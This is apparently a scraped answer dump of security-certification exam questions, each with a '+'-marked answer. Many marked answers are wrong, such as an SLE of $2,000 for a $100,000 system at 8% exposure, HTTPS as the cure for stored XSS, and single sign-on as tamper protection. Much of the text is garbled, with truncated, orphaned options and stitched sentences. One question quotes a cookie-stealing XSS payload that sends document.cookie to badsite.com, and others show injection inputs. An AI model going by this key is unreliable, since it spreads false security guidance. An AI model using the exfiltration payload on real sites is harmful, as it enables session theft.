Test2

An administrator wants to enable policy based flexible mandatory access controls on an open|source OS to prevent abnormal application modifications or executions. Which of the following|would BEST accomplish this?|+Access control lists

Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk|space. Which of the following is a more cost effective alternative to buying a new SAN?|+Enable multipath to increase availability

A systems administrator establishes a CIFS share on a UNIX device to share data to Windows|systems. The security authentication on the Windows domain is set to the highest level. Windows|users are stating that they cannot authenticate to the UNIX share. Which of the following settings|on the UNIX server would correct this problem?|+Refuse LM and only accept NTLMv2

A security architect is designing a new infrastructure using both type 1 and type 2 virtual|machines. In addition to the normal complement of security controls (e.g. antivirus, host|hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store|cryptographic keys used to sign code and code modules on the VMs. Which of the following will|meet this goal without requiring any hardware pass-through implementations?|+vTPM

A user has a laptop configured with multiple operating system installations. The operating systems|are all installed on a single SSD, but each has its own partition and logical volume. Which of the|following is the BEST way to ensure confidentiality of individual operating system data?|+Encryption of each individual partition

After being notified of an issue with the online shopping cart, where customers are able to|arbitrarily change the price of listed items, a programmer analyzes the following piece of code|used by a web based shopping cart.|SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT);|The programmer found that every time a user adds an item to the cart, a temporary file is created|on the web server /tmp directory. The temporary file has a name which is generated by|concatenating the content of the $USERINPUT variable and a timestamp in the form of MMDDYYYY,|(e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased.|Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s|items?|+Input validation

The administrator is troubleshooting availability issues on an FCoE-based storage array that uses|deduplication. The single controller in the storage array has failed, so the administrator wants to|move the drives to a storage array from a different manufacturer in order to access the data.|Which of the following issues may potentially occur?|+The data may not be in a usable format.

Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser|crashes the browser and then allows him to gain remote code execution in the context of the|victim’s privilege level. The browser crashes due to an exception error when a heap memory that|is unused is accessed. Which of the following BEST describes the application issue?|+Integer overflow

A developer is determining the best way to improve security within the code being developed. The|developer is focusing on input fields where customers enter their credit card details. Which of the|following techniques, if implemented in the code, would be the MOST effective in protecting the|fields from malformed input?|+Client side input validation

A penetration tester is assessing a mobile banking application. Man-in-the-middle attempts via a|HTTP intercepting proxy are failing with SSL errors. Which of the following controls has likely been|implemented by the developers?|+SSL certificate revocation

A system administrator needs to meet the maximum amount of security goals for a new DNS|infrastructure. The administrator deploys DNSSEC extensions to the domain names and|infrastructure. Which of the following security goals does this meet? (Select TWO).|+Availability

The risk manager is reviewing a report which identifies a requirement to keep a business critical|legacy system operational for the next two years. The legacy system is out of support because the|vendor and security patches are no longer released. Additionally, this is a proprietary embedded|system and little is documented and known about it. Which of the following should the Information|Technology department implement to reduce the security risk from a compromise of this system?|+Virtualize the system and migrate it to a cloud provider.

An organization would like to allow employees to use their network username and password to|access a third-party service. The company is using Active Directory Federated Services for their|directory service. Which of the following should the company ensure is supported by the third|party? (Select TWO).|+LDAP/S

An extensible commercial software system was upgraded to the next minor release version to|patch a security vulnerability. After the upgrade, an unauthorized intrusion into the system was|detected. The software vendor is called in to troubleshoot the issue and reports that all core|components were updated properly. Which of the following has been overlooked in securing the|system? (Select TWO).|+The company’s IDS signatures were not updated.

A forensic analyst works for an e-discovery firm where several gigabytes of data are processed|daily. While the business is lucrative, they do not have the resources or the scalability to|adequately serve their clients. Since it is an e-discovery firm where chain of custody is important,|which of the following scenarios should they consider?|+Offload some data processing to a public cloud

A company is deploying a new iSCSI-based SA+The requirements are as follows:| SAN nodes must authenticate each other.| Shared keys must NOT be used.| Do NOT use encryption in order to gain performance.|Which of the following design specifications meet all the requirements? (Select TWO).|+Targets use CHAP authentication

Company XYZ provides hosting services for hundreds of companies across multiple industries|including healthcare, education, and manufacturing. The security architect for company XYZ is|reviewing a vendor proposal to reduce company XYZ’s hardware costs by combining multiple|physical hosts through the use of virtualization technologies. The security architect notes concerns|about data separation, confidentiality, regulatory requirements concerning PII, and administrative|complexity on the proposal. Which of the following BEST describes the core concerns of the|security architect?|and access to information by outside users.|account for the transfer of virtual machines between physical platforms for regular maintenance.|accessed by a malicious user who has gained access to the virtual machine of another hosted|customer.|complexity of maintaining multiple security postures on a single hypervisor negates hardware cost|savings.|+Most of company XYZ’s customers are willing to accept the risks of unauthorized disclosure

A university requires a significant increase in web and database server resources for one week,|twice a year, to handle student registration. The web servers remain idle for the rest of the year.|Which of the following is the MOST cost effective way for the university to securely handle student|registration?|+Virtualize the web servers locally to add capacity during registration.

Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions.|When speaking with the network administrator, the security administrator learns that the existing|routers have the minimum processing power to do the required level of encryption. Which of the|following solutions minimizes the performance impact on the router?|+Deploy inline network encryption devices

A security administrator was doing a packet capture and noticed a system communicating with an|unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no|IPv6 routing into or out of the network. Which of the following is the BEST course of action?|+Investigate the network traffic and block UDP port 3544 at the firewall

In order to reduce costs and improve employee satisfaction, a large corporation is creating a|BYOD policy. It will allow access to email and remote connections to the corporate enterprise from|personal devices; provided they are on an approved device list. Which of the following security|measures would be MOST effective in securing the enterprise under the new policy? (Select|TWO).|+Provide free email software for personal devices.

A security administrator is tasked with implementing two-factor authentication for the company|VP+The VPN is currently configured to authenticate VPN users against a backend RADIUS|server. New company policies require a second factor of authentication, and the Information|Security Officer has selected PKI as the second factor. Which of the following should the security|administrator configure and implement on the VPN concentrator to implement the second factor|and ensure that no error messages are displayed to the user during the VPN connection? (Select|TWO).|VPN concentrator.|+The user’s certificate private key must be installed on the VPN concentrator.

Ann, a software developer, wants to publish her newly developed software to an online store. Ann|wants to ensure that the software will not be modified by a third party or end users before being|installed on mobile devices. Which of the following should Ann implement to stop modified copies|of her software from running on mobile devices?|+Single sign-on

Two separate companies are in the process of integrating their authentication infrastructure into a|unified single sign-on system. Currently, both companies use an AD backend and two factor|authentication using TOT+The system administrators have configured a trust relationship|between the authentication backend to ensure proper process flow. How should the employees|request access to shared resources before the authentication integration is complete?|their original password.|where #### is the second factor code.|and the next 6-digit code displayed when the token button is depressed.|and their 6-digit code.|+They should logon to the system using the username concatenated with the 6-digit code and

An industry organization has implemented a system to allow trusted authentication between all of|its partners. The system consists of a web of trusted RADIUS servers communicating over the|Internet. An attacker was able to set up a malicious server and conduct a successful man-inthemiddle|attack. Which of the following controls should be implemented to mitigate the attack in|the future?|+Use PAP for secondary authentication on each RADIUS server

Joe, the Chief Executive Officer (CEO), was an Information security professor and a Subject|Matter Expert for over 20 years. He has designed a network defense method which he says is|significantly better than prominent international standards. He has recommended that the|company use his cryptographic method. Which of the following methodologies should be|adopted?|organizations.|+The company should develop an in-house solution and keep the algorithm a secret.

Which of the following BEST constitutes the basis for protecting VMs from attacks from other VMs|hosted on the same physical platform?|+Aggressive patch management on the host and guest OSs.

Two universities are making their 802.11n wireless networks available to the other university’s|students. The infrastructure will pass the student’s credentials back to the home school for|authentication via the Internet.| The requirements are:| Mutual authentication of clients and authentication server| The design should not limit connection speeds| Authentication must be delegated to the home school| No passwords should be sent unencrypted|The following design was implemented:| WPA2 Enterprise using EAP-PEAP-MSCHAPv2 will be used for wireless security| RADIUS proxy servers will be used to forward authentication requests to the home school| The RADIUS servers will have certificates from a common public certificate authority|A strong shared secret will be used for RADIUS server authentication|Which of the following security considerations should be added to the design?|Topic 6, Mixed Questions|+The transport layer between the RADIUS servers should be secured

A company with 2000 workstations is considering purchasing a HIPS to minimize the impact of a|system compromise from malware. Currently, the company projects a total cost of $50,000 for the|next three years responding to and eradicating workstation malware. The Information Security|Officer (ISO) has received three quotes from different companies that provide HIPS.| The first quote requires a $10,000 one-time fee, annual cost of $6 per workstation, and a 10%|annual support fee based on the number of workstations.| The second quote requires a $15,000 one-time fee, an annual cost of $5 per workstation, and a|12% annual fee based on the number of workstations.| The third quote has no one-time fee, an annual cost of $8 per workstation, and a 15% annual fee|based on the number of workstations.|Which solution should the company select if the contract is only valid for three years?|+First quote

Customers are receiving emails containing a link to malicious software. These emails are|subverting spam filters. The email reads as follows:| Delivered-To: customer@example.com| Received: by 10.14.120.205| Mon, 1 Nov 2010 11:15:24 -0700 (PDT)| Received: by 10.231.31.193| Mon, 01 Nov 2010 11:15:23 -0700 (PDT)| Return-Path: | Received: from 127.0.0.1 for ; Mon, 1 Nov 2010 13:15:14 -0500|(envelope-from )| Received: by smtpex.example.com (SMTP READY)| with ESMTP (AIO); Mon, 01 Nov 2010 13:15:14 -0500| Received: from 172.18.45.122 by 192.168.2.55; Mon, 1 Nov 2010 13:15:14 -0500| From: Company | To: "customer@example.com" | Date: Mon, 1 Nov 2010 13:15:11 -0500| Subject: New Insurance Application| Thread-Topic: New Insurance Application|Please download and install software from the site below to maintain full access to your account.|www.examplesite.com|________________________________|Additional information: The authorized mail servers IPs are 192.168.2.10 and 192.168.2.11.| The network’s subnet is 192.168.2.0/25.| Which of the following are the MOST appropriate courses of action a security administrator could|take to eliminate this risk? (Select TWO).|+Identify the origination point for malicious activity on the unauthorized mail server.

A security administrator notices the following line in a server's security log:| <script>document.location='http://badsite.com/?q='document.cookie') + "';| The administrator is concerned that it will take the developer a lot of time to fix the application that|is running on the server. Which of the following should the security administrator implement to|prevent this particular attack?|+WAF

Holiday accommodations. The front-facing web server offers an HTML form, which asks for a|user’s age. This input gets placed into a signed integer variable and is then checked to ensure|that the user is in the adult age range.| Users have reported that the website is not functioning correctly. The web developer has|inspected log files and sees that a very large number (in the billions) was submitted just before the|issue started occurring. Which of the following is the MOST likely situation that has occurred?|application from continuing to function. Improper error handling prevented the application from|recovering.|which led to unpredictable application behavior. Improper error handling prevented the application|from recovering.|issues are not related to the large number being input.|Improper error handling prevented the application from recovering.|+The age variable stored the large number and filled up disk space which stopped the

A company has decided to change its current business direction and refocus on core business.|Consequently, several company sub-businesses are in the process of being sold-off. A security|consultant has been engaged to advise on residual information security concerns with a|demerger. From a high-level perspective, which of the following BEST provides the procedure that|the consultant should follow?|test after the de-merger. Identify the gaps between the two tests.|security posture of the company does not decline.|demergers. This needs to be handled by legal representatives well versed in corporate law.|security gaps will be from a physical, technical, DR, and policy/awareness perspective.|+Perform a penetration test for the current state of the company. Perform another penetration

It has come to the IT administrator’s attention that the “post your comment” field on the company|blog page has been exploited, resulting in cross-site scripting attacks against customers reading|the blog. Which of the following would be the MOST effective at preventing the “post your|comment” field from being exploited?|+Update the blog page to HTTPS

A business unit of a large enterprise has outsourced the hosting and development of a new|external website which will be accessed by premium customers, in order to speed up the time to|market timeline. Which of the following is the MOST appropriate?|contract to provide a secure service which is regularly tested (vulnerability and penetration). SLAs|should be in place for the resolution of newly identified vulnerabilities and a guaranteed uptime.|recommended as the costs are typically higher than what can be achieved internally. In addition,|compliance with privacy regulations becomes more complex and guaranteed uptimes are difficult|to track and measure.|of newly identified vulnerabilities and penetration / vulnerability testing should be conducted|regularly.|obligations. An MOU should be in place for the resolution of newly identified vulnerabilities and|penetration / vulnerability testing should be conducted regularly.|+The external party providing the hosting and website development should be obligated under

An administrator is tasked with securing several website domains on a web server. The|administrator elects to secure www.example.com, mail.example.org, archive.example.com, and|www.example.org with the same certificate. Which of the following would allow the administrator|to secure those domains with a single issued certificate?|+Intermediate Root Certificate

An administrator wishes to replace a legacy clinical software product as it has become a security|risk. The legacy product generates $10,000 in revenue a month. The new software product has an|initial cost of $180,000 and a yearly maintenance of $2,000 after the first year. However, it will|generate $15,000 in revenue per month and be more secure. How many years until there is a|return on investment for this new package?|+1

A large company is preparing to merge with a smaller company. The smaller company has been|very profitable, but the smaller company’s main applications were created in-house. Which of the|following actions should the large company’s security administrator take in preparation for the|merger?|company should be performed.|used.|associated with the software.|+A review of the mitigations implemented from the most recent audit findings of the smaller

Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target|information?|+Deduplication

Company ABC is hiring customer service representatives from Company XY+The|representatives reside at Company XYZ’s headquarters. Which of the following BEST prevents|Company XYZ representatives from gaining access to unauthorized Company ABC systems?|systems|+Require each Company XYZ employee to use an IPSec connection to the required systems

A Chief Information Security Officer (CISO) has requested that a SIEM solution be implemented.|The CISO wants to know upfront what the projected TCO would be before looking further into this|concern. Two vendor proposals have been received:| Vendor A: product-based solution which can be purchased by the pharmaceutical company.| Capital expenses to cover central log collectors, correlators, storage and management consoles|expected to be $150,000. Operational expenses are expected to be a 0.5 full time employee|(FTE) to manage the solution, and 1 full time employee to respond to incidents per year.| Vendor B: managed service-based solution which can be the outsourcer for the pharmaceutical|company’s needs.|Bundled offering expected to be $100,000 per year.|Operational expenses for the pharmaceutical company to partner with the vendor are expected to|be a 0.5 FTE per year.|Internal employee costs are averaged to be $80,000 per year per FT+Based on calculating TCO|of the two vendor proposals over a 5 year period, which of the following options is MOST|accurate?|+Based on cost alone, having an outsourced solution appears cheaper.

A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual|machines, this virtual hardware is indistinguishable from real hardware. By implementing|virtualized TPMs, which of the following trusted system concepts can be implemented?|+Software-based root of trust

A port in a fibre channel switch failed, causing a costly downtime on the company’s primary|website. Which of the following is the MOST likely cause of the downtime?|+The web server iSCSI initiator was down.

An internal development team has migrated away from Waterfall development to use Agile|development. Overall, this has been viewed as a successful initiative by the stakeholders as it has|improved time-to-market. However, some staff within the security team have contended that Agile|development is not secure. Which of the following is the MOST accurate statement?|need similar amounts of security effort at the same phases of development.|design and inability to perform security reviews.|has the advantage of having been able to incorporate security best practices of recent years.|need to be adapted and performed within relevant Agile phases.|+Agile and Waterfall approaches have the same effective level of security posture. They both

A vulnerability scanner report shows that a client-server host monitoring solution operating in the|credit card corporate environment is managing SSL sessions with a weak algorithm which does|not meet corporate policy. Which of the following are true statements? (Select TWO).|+The X509 V3 certificate was issued by a non trusted public CA.

Which of the following represents important technical controls for securing a SAN storage|infrastructure? (Select TWO).|+Synchronous copy of data

An enterprise must ensure that all devices that connect to its networks have been previously|approved. The solution must support dual factor mutual authentication with strong identity|assurance. In order to reduce costs and administrative overhead, the security architect wants to|outsource identity proofing and second factor digital delivery to the third party. Which of the|following solutions will address the enterprise requirements?|+Implementing federated network access with the third party.

A security administrator is performing VDI traffic data collection on a virtual server which migrates|from one host to another. While reviewing the data collected by the protocol analyzer, the security|administrator notices that sensitive data is present in the packet capture. Which of the following|should the security administrator recommend to ensure the confidentiality of sensitive information|during live VM migration, while minimizing latency issues?|operations.|servers.|sensitive data.|network.|+A separate physical interface placed on a private VLAN should be configured for live host

Joe is a security architect who is tasked with choosing a new NIPS platform that has the ability to|perform SSL inspection, analyze up to 10Gbps of traffic, can be centrally managed and only|reveals inspected application payload data to specified internal security employees. Which of the|following steps should Joe take to reach the desired outcome?|evaluate RFP responses to ensure that the vendor product meets all mandatory requirements.|Test the product and make a product recommendation.|industry surveys, interview existing customers of the product and then recommend that the|product be purchased.|provider on the basis that each of the requirements are met and a lower total cost of ownership|(TCO) is achieved.|management to a cloud provider. Give access to internal security employees so that they can|inspect the application payload data.|threats emerging from social media, BYOD and cloud storage prior to purchasing the product.|+Research new technology vendors to look for potential products. Contribute to an RFP and then

A penetration tester is inspecting traffic on a new mobile banking application and sends the|following web request:|POST http://www.example.com/resources/NewBankAccount HTTP/1.1| Content-type: application/json| { “account”:| [| { “creditAccount”:”Credit Card Rewards account”} {|“salesLeadRef”:”www.example.com/badcontent/exploitme.exe”}| ],| “customer”:| [| { “name”:”Joe Citizen”} { “custRef”:”3153151”}| ]| }|The banking website responds with:| HTTP/1.1 200 OK| { “newAccountDetails”:| [| { “cardNumber”:”1234123412341234”} { “cardExpiry”:”2020-12-31”}| { “cardCVV”:”909”}| ],| “marketingCookieTracker”:“JSESSIONID=000000001”| “returnCode”:“Account added successfully”| }|Which of the following are security weaknesses in this example? (Select TWO).|+Missing input validation on some fields

Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a|mobile web application and a RESTful application server. Which of the following security tools|would be required to assess the security between the mobile web application and the RESTful|application server? (Select TWO).|+Jailbroken mobile device

Ann is testing the robustness of a marketing website through an intercepting proxy. She has|intercepted the following HTTP request:|POST /login.aspx HTTP/1.1| Host: comptia.org| Content-type: text/html| txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true|Which of the following should Ann perform to test whether the website is susceptible to a simple|authentication bypass?|+Remove all of the post data and change the request to /login.aspx from POST to GET

An organization is concerned with potential data loss in the event of a disaster, and created a|backup datacenter as a mitigation strategy. The current storage method is a single NAS used by|all servers in both datacenters. Which of the following options increases data availability in the|event of a datacenter failure?|+Replicate NAS changes to the tape backups at the other datacenter.

An organization has implemented an Agile development process for front end web application|development. A new security architect has just joined the company and wants to integrate security|activities into the SDLC.|Which of the following activities MUST be mandated to ensure code quality from a security|perspective? (Select TWO).|+Static and dynamic analysis is run as part of integration

ABC Corporation uses multiple security zones to protect systems and information, and all of the|VM hosts are part of a consolidated VM infrastructure. Each zone has different VM administrators.|Which of the following restricts different zone administrators from directly accessing the console of|a VM host from another zone?|correct virtual NIC(s).|+Ensure hypervisor layer firewalling between all VM hosts regardless of security zone.

A security administrator has been asked to select a cryptographic algorithm to meet the criteria of|a new application. The application utilizes streaming video that can be viewed both on computers|and mobile devices. The application designers have asked that the algorithm support the transport|encryption with the lowest possible performance overhead. Which of the following|recommendations would BEST meet the needs of the application designers? (Select TWO).|+Use AES in Electronic Codebook mode

ABC Company must achieve compliance for PCI and SO+Which of the following would BEST|allow the organization to achieve compliance and ensure security? (Select THREE).|+Establish a list of users that must work with each regulation

A pentester must attempt to crack passwords on a windows domain that enforces strong complex|passwords. Which of the following would crack the MOST passwords in the shortest time period?|+Online password testing

A security analyst, Ann, states that she believes Internet facing file transfer servers are being|attacked. Which of the following is evidence that would aid Ann in making a case to management|that action needs to be taken to safeguard these servers?|+Provide a report of all the IP addresses that are connecting to the systems and their locations

A recently hired security administrator is advising developers about the secure integration of a|legacy in-house application with a new cloud based processing system. The systems must|exchange large amounts of fixed format data such as names, addresses, and phone numbers, as|well as occasional chunks of data in unpredictable formats. The developers want to construct a|new data format and create custom tools to parse and process the data. The security|administrator instead suggests that the developers:|+Create a custom standard to define the data.

A user is suspected of engaging in potentially illegal activities. Law enforcement has requested|that the user continue to operate on the network as normal. However, they would like to have a|copy of any communications from the user involving certain key terms. Additionally, the law|enforcement agency has requested that the user's ongoing communication be retained in the|user's account for future investigations. Which of the following will BEST meet the goals of law|enforcement?|email account.|future investigation.|applicable emails.|the search terms.|+Begin a chain-of-custody on for the user's communication. Next, place a legal hold on the user's

An administrator has enabled salting for users' passwords on a UNIX box. A penetration tester|must attempt to retrieve password hashes. Which of the following files must the penetration tester|use to eventually obtain passwords on the system? (Select TWO).|+/etc/passwd

The latest independent research shows that cyber attacks involving SCADA systems grew an|average of 15% per year in each of the last four years, but that this year’s growth has slowed to|around 7%. Over the same time period, the number of attacks against applications has decreased|or stayed flat each year. At the start of the measure period, the incidence of PC boot loader or|BIOS based attacks was negligible. Starting two years ago, the growth in the number of PC boot|loader attacks has grown exponentially. Analysis of these trends would seem to suggest which of|the following strategies should be employed?|increase substantially and spending on PC boot loader controls should increase substantially.|decrease slightly and spending on PC boot loader protections should increase substantially.|be suspended, and PC boot loader protection research should increase by 100%.|should increase slightly, and spending on PC boot loader protections should remain steady.|+Spending on SCADA protections should stay steady; application control spending should

An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer|overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?|+Deploy custom HIPS signatures to detect and block the attacks.

Which of the following would be used in forensic analysis of a compromised Linux system? (Select|THREE).|+Check log files for logins from unauthorized IPs.

The helpdesk is receiving multiple calls about slow and intermittent Internet access from the|finance department. The following information is compiled:|Caller 1, IP 172.16.35.217, NETMASK 255.255.254.0| Caller 2, IP 172.16.35.53, NETMASK 255.255.254.0| Caller 3, IP 172.16.35.173, NETMASK 255.255.254.0|All callers are connected to the same switch and are routed by a router with five built-in interfaces.|The upstream router interface’s MAC is 00-01-42-32-ab-1a|A packet capture shows the following:| 09:05:15.934840 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)| 09:06:16.124850 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)| 09:07:25.439811 arp reply 172.16.34.1 is-at 00:01:42:32:ab:1a (00:01:42:32:ab:1a)| 09:08:10.937590 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2305, seq 1, length|65534| 09:08:10.937591 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2306, seq 2, length|65534| 09:08:10.937592 IP 172.16.35.1 > 172.16.35.255: ICMP echo request, id 2307, seq 3, length|65534|Which of the following is occurring on the network?|+A man-in-the-middle attack is underway on the network.

An organization recently upgraded its wireless infrastructure to support 802.1x and requires all|clients to use this method. After the upgrade, several critical wireless clients fail to connect|because they are only pre-shared key compliant. For the foreseeable future, none of the affected|clients have an upgrade path to put them into compliance with the 802.1x requirement. Which of|the following provides the MOST secure method of integrating the non-compliant clients into the|network?|at random intervals.|required communication paths.|certificate-based 802.1x.|+Create a separate SSID and require the use of dynamic encryption keys.

The following has been discovered in an internally developed application:|Error - Memory allocated but not freed:| char *myBuffer = malloc(BUFFER_SIZE);| if (myBuffer != NULL) {| *myBuffer = STRING_WELCOME_MESSAGE;| printf(“Welcome to: %s\n”, myBuffer);|}| exit(0);|Which of the following security assessment methods are likely to reveal this security weakness?|(Select TWO).|+Static code analysis

A medical device manufacturer has decided to work with another international organization to|develop the software for a new robotic surgical platform to be introduced into hospitals within the|next 12 months. In order to ensure a competitor does not become aware, management at the|medical device manufacturer has decided to keep it secret until formal contracts are signed.|Which of the following documents is MOST likely to contain a description of the initial terms and|arrangement and is not legally enforceable?|+OLA

After the install process, a software application executed an online activation process. After a few|months, the system experienced a hardware failure. A backup image of the system was restored|on a newer revision of the same brand and model device. After the restore, the specialized|application no longer works. Which of the following is the MOST likely cause of the problem?|+The binary files used by the application have been modified by malware.

A bank is in the process of developing a new mobile application. The mobile client renders content|and communicates back to the company servers via REST/JSON calls. The bank wants to ensure|that the communication is stateless between the mobile application and the web services gateway.|Which of the following controls MUST be implemented to enable stateless communication?|+Generate a one-time key as part of the device registration process.

The network administrator at an enterprise reported a large data leak. One compromised server|was used to aggregate data from several critical application servers and send it out to the Internet|using HTTP+Upon investigation, there have been no user logins over the previous week and the|endpoint protection software is not reporting any issues. Which of the following BEST provides|insight into where the compromised server collected the information?|services.|+Review the flow data against each server’s baseline communications profile.

Wireless users are reporting issues with the company’s video conferencing and VoIP systems.|The security administrator notices internal DoS attacks from infected PCs on the network causing|the VoIP system to drop calls. The security administrator also notices that the SIP servers are|unavailable during these attacks. Which of the following security controls will MOST likely mitigate|the VoIP DoS attacks on the network? (Select TWO).|+Install a HIPS on the SIP servers

During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply|with policy. Six months later, the company is audited for compliance to regulations. The audit|discovers that 40 percent of the desktops do not meet requirements. Which of the following is the|MOST likely cause of the noncompliance?|latest patches.|+The devices are being modified and settings are being overridden in production.

Select id, firstname, lastname from authors| User input= firstname= Hack;man| lastname=Johnson|Which of the following types of attacks is the user attempting?|+XML injection

A company that must comply with regulations is searching for a laptop encryption product to use|for its 40,000 end points. The product must meet regulations but also be flexible enough to|minimize overhead and support in regards to password resets and lockouts. Which of the following|implementations would BEST meet the needs?|authentication|authentication|+A partition-based software encryption product with a low-level boot protection and

A company decides to purchase commercially available software packages. This can introduce|new security risks to the network. Which of the following is the BEST description of why this is|true?|Information concerning vulnerabilities and viable attack patterns are never revealed by the|developer to avoid lawsuits.|vulnerabilities is often kept internal to the company that developed the software.|areas. Information concerning vulnerabilities is often ignored by business managers.|concerning vulnerabilities and viable attack patterns are always shared within the IT community.|+Commercially available software packages are typically well known and widely available.

A firm’s Chief Executive Officer (CEO) is concerned that IT staff lacks the knowledge to identify|complex vulnerabilities that may exist in a payment system being internally developed. The|payment system being developed will be sold to a number of organizations and is in direct|competition with another leading product. The CEO highlighted that code base confidentiality is of|critical importance to allow the company to exceed the competition in terms of the product’s|reliability, stability, and performance. Which of the following would provide the MOST thorough|testing and satisfy the CEO’s requirements?|resources for random testing.|and address all findings.|and address all findings.|testing and code reviews.|+Sign a MOU with a marketing firm to preserve the company reputation and use in-house

A company provides on-demand cloud computing resources for a sensitive project. The company|implements a fully virtualized datacenter and terminal server access with two-factor authentication|for customer access to the administrative website. The security administrator at the company has|uncovered a breach in data confidentiality. Sensitive data from customer A was found on a hidden|directory within the VM of company+Company B is not in the same industry as company A and|the two are not competitors. Which of the following has MOST likely occurred?|access each and move the data.|same network segment.|attack to gain unauthorized access.|memory onto a mapped disk.|+Both VMs were left unsecured and an attacker was able to exploit network vulnerabilities to

A system worth $100,000 has an exposure factor of eight percent and an ARO of four. Which of|the following figures is the system’s SLE?|+$2,000

VPN users cannot access the active FTP server through the router but can access any server in|the data center.|Additional network information:| DMZ network – 192.168.5.0/24 (FTP server is 192.168.5.11)| VPN network – 192.168.1.0/24| Datacenter – 192.168.2.0/24| User network - 192.168.3.0/24| HR network – 192.168.4.0/24\|Traffic shaper configuration:| VLAN Bandwidth Limit (Mbps)| VPN50| User175| HR250| Finance250| Guest0|Router ACL:| ActionSourceDestination| Permit192.168.1.0/24192.168.2.0/24| Permit192.168.1.0/24192.168.3.0/24| Permit192.168.1.0/24192.168.5.0/24| Permit192.168.2.0/24192.168.1.0/24| Permit192.168.3.0/24192.168.1.0/24| Permit192.168.5.1/32192.168.1.0/24| Deny192.168.4.0/24192.168.1.0/24| Deny192.168.1.0/24192.168.4.0/24| Denyanyany|Which of the following solutions would allow the users to access the active FTP server?|+Add a permit statement to allow traffic from 192.168.5.0/24 to the VPN network

Company policy requires that all company laptops meet the following baseline requirements:| Software requirements:|Antivirus| Anti-malware| Anti-spyware| Log monitoring| Full-disk encryption| Terminal services enabled for RDP| Administrative access for local users|Hardware restrictions:| Bluetooth disabled| FireWire disabled| WiFi adapter disabled|Ann, a web developer, reports performance issues with her laptop and is not able to access any|network resources. After further investigation, a bootkit was discovered and it was trying to access|external websites. Which of the following hardening techniques should be applied to mitigate this|specific issue from reoccurring? (Select TWO).|+Group policy to limit web access

A security manager looked at various logs while investigating a recent security breach in the data|center from an external source. Each log below was collected from various security devices|compiled from a report through the company’s security information and event management server.|Logs:| Log 1:| Feb 5 23:55:37.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.2.5.81 3 packets|Log 2:| HTTP://www.company.com/index.php?user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa|Log 3:| Security Error Alert| Event ID 50: The RDP protocol component X.224 detected an error in the protocol stream and|has disconnected the client|Log 4:| Encoder oe = new OracleEncoder ();| String query = “Select user_id FROM user_data WHERE user_name = ‘ ”| + oe.encode ( req.getParameter(“userID”) ) + “ ‘ and user_password = ‘ “| + oe.encode ( req.getParameter(“pwd”) ) +” ‘ “;|Vulnerabilities| Buffer overflow| SQL injection| ACL| XSS|Which of the following logs and vulnerabilities would MOST likely be related to the security|breach? (Select TWO).|+Log 1

A storage as a service company implements both encryption at rest as well as encryption in transit|of customers’ data. The security administrator is concerned with the overall security of the|encrypted customer data stored by the company servers and wants the development team to|implement a solution that will strengthen the customer’s encryption key. Which of the following, if|implemented, will MOST increase the time an offline password attack against the customers’ data|would take?|+key = NULL ; for (int i=0; i<5000; i++) { key = sha(key + password) }

After reviewing a company’s NAS configuration and file system access logs, the auditor is advising|the security administrator to implement additional security controls on the NFS export. The|security administrator decides to remove the no_root_squash directive from the export and add|the nosuid directive. Which of the following is true about the security controls implemented by the|security administrator?|be controlled by the root user.|important files owned by root on the NAS.|modify other user’s files on the NAS.|over NFS even after using the SU command.|+The newly implemented security controls are in place to ensure that NFS encryption can only

A government agency considers confidentiality to be of utmost importance and availability issues|to be of least importance. Knowing this, which of the following correctly orders various|vulnerabilities in the order of MOST important to LEAST important?|+Insecure direct object references, CSRF, Smurf

An IT auditor is reviewing the data classification for a sensitive system. The company has|classified the data stored in the sensitive system according to the following matrix:|DATA TYPECONFIDENTIALITYINTEGRITYAVAILABILITY| ----------------------------------------------------------------------------------------------------------------| FinancialHIGHHIGHLOW| Client nameMEDIUMMEDIUMHIGH| Client addressLOWMEDIUMLOW| -----------------------------------------------------------------------------------------------------------------| AGGREGATEMEDIUMMEDIUMMEDIUM|The auditor is advising the company to review the aggregate score and submit it to senior|management. Which of the following should be the revised aggregate score?|+HIGH, MEDIUM, LOW

A security auditor suspects two employees of having devised a scheme to steal money from the|company. While one employee submits purchase orders for personal items, the other employee|approves these purchase orders. The auditor has contacted the human resources director with|suggestions on how to detect such illegal activities. Which of the following should the human|resource director implement to identify the employees involved in these activities and reduce the|risk of this activity occurring in the future?|+Background checks

During an incident involving the company main database, a team of forensics experts is hired to|respond to the breach. The team is in charge of collecting forensics evidence from the company’s|database server. Which of the following is the correct order in which the forensics team should|engage?|storage, implement chain of custody, and analyze original media.|custody, document, and analyze the data.|storage, and document the findings.|document, and implement chain of custody.|+Notify senior management, secure the scene, capture volatile storage, capture non-volatile

A security administrator has noticed that an increased number of employees’ workstations are|becoming infected with malware. The company deploys an enterprise antivirus system as well as|a web content filter, which blocks access to malicious web sites where malware files can be|downloaded. Additionally, the company implements technical measures to disable external|storage. Which of the following is a technical control that the security administrator should|implement next to reduce malware infection?|+Implement an Acceptable Use Policy which addresses malware downloads.

